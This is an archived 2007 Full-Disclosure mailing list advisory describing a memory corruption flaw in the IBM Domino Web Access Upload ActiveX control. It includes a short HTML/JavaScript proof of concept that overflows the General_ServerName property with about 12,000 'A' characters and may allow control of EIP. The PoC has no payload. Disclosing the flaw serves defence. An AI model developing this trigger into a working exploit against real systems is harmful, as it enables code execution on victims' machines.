Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security FullDisclosure
[Top] [All Lists]

[Full-disclosure] IBM Domino Web Access Upload Control dwa7w.dll Memory

Subject: [Full-disclosure] IBM Domino Web Access Upload Control dwa7w.dll Memory Corruption
Date: Thu, 20 Dec 2007 13:27:00 -0500 (GMT-05:00)
The Domino Web Access Upload Module version 7.0.34.1 seems to suffer from a 
memory corruption issue that may allow the execution of arbitrary code. By 
setting the General_ServerName property and calling the 
InstallBrowserHelperDll() function it MAY be possible to control the ECX 
register and thereby control the EIP. PoC as follows:

-------------------
<!--
written by e.b.
-->
<html>
 <head>
  <script language="JavaScript" DEFER>
   function Check() {
     var s = 'A';

    while (s.length <= 12000) s = s + 'A';

    obj.General_ServerName = s;
    obj.InstallBrowserHelperDll();
  
   }
  </script>

 </head>
 <body onload="JavaScript: return Check();">
<object id="obj" classid="clsid:E008A543-CEFB-4559-912F-C27C2B89F13B" />
</object>
</body>
</html> 
-------------------


Elazar

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

<Prev in Thread] Current Thread [Next in Thread>
  • [Full-disclosure] IBM Domino Web Access Upload Control dwa7w.dll Memory Corruption, Elazar Broad <=